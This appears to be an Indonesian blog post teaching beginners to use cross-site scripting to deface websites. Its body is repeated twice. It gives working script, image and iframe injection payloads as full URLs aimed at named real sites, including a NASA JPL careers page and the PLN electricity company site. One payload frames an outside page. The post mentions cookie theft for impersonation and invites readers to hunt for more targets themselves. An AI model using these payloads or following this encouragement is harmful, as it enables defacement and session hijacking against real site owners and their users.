XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Apaan sih XSS tuh ?
Nah Cukup Sampai Disini dulu ya nah selanjutnya eksperimen aja sendiri :P Target XSS bisa di cari di google atau www.xssed.com
Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)
Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.
Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah : 1.untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata= </script><script>alert('I>A Hacks Memang Ganteng');</script> Contoh : http://amihackerproof.com/Results/tos.php?scan_id=</ script><script>alert('I>A Hacks Memang Ganteng');</script>
Berikut adalah Contoh XSS Penambahan Gambar di web Cara nya masukkan script ini "> <img+src=Link Gambar Kamu></img> di Link dekat address bar sesudah tanda contoh : https://careerlaunch.jpl.nasa.gov/ci20/index.jspapplicationName=%22%3E%3Cimg+src=http://1.bp.blogspot.com/t81DzCjO_Vg/T3agGaAASJI/AAAAAAAAAQw/JUBgwh5u5TU/s400/IAHACK.jpg%3E%3C/img%3E
Ini adalah contoh XSS penambahan HTML code atau yang biasa disebut Frame xss Caranya masukkan script Ini <iframe width="640" height="480" src="www.Link Website Kamu.com " frameborder="0" allowfullscreen></iframe> ke Link target sesudah tanda = Contoh:http://www.pln.co.id/kontakkami/telusur.phpnokeluhan=%22%20style=%22display:no ne%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ciframe%20width=%226 40%22%20height=%22480%22%20src=%22http://xssbagus.16mb.com/admin.html%22%20fr ameborder=%220%22% 20allowfullscreen%3E%3C/iframe%3E
Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.
Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah : 1.untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata= </script><script>alert('I>A Hacks Memang Ganteng');</script> Contoh : http://amihackerproof.com/Results/tos.php?scan_id=</ script><script>alert('I>A Hacks Memang Ganteng');</script>
Berikut adalah Contoh XSS Penambahan Gambar di web Cara nya masukkan script ini "> <img+src=Link Gambar Kamu></img> di Link dekat address bar sesudah tanda contoh : https://careerlaunch.jpl.nasa.gov/ci20/index.jspapplicationName=%22%3E%3Cimg+src=http://1.bp.blogspot.com/t81DzCjO_Vg/T3agGaAASJI/AAAAAAAAAQw/JUBgwh5u5TU/s400/IAHACK.jpg%3E%3C/img%3E
Ini adalah contoh XSS penambahan HTML code atau yang biasa disebut Frame xss Caranya masukkan script Ini <iframe width="640" height="480" src="www.Link Website Kamu.com " frameborder="0" allowfullscreen></iframe> ke Link target sesudah tanda = Contoh:http://www.pln.co.id/kontakkami/telusur.phpnokeluhan=%22%20style=%22display:no ne%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ciframe%20width=%226 40%22%20height=%22480%22%20src=%22http://xssbagus.16mb.com/admin.html%22%20fr ameborder=%220%22% 20allowfullscreen%3E%3C/iframe%3E
Nah Cukup Sampai Disini dulu ya nah selanjutnya eksperimen aja sendiri :P Target XSS bisa di cari di google atau www.xssed.com
Komentar
Posting Komentar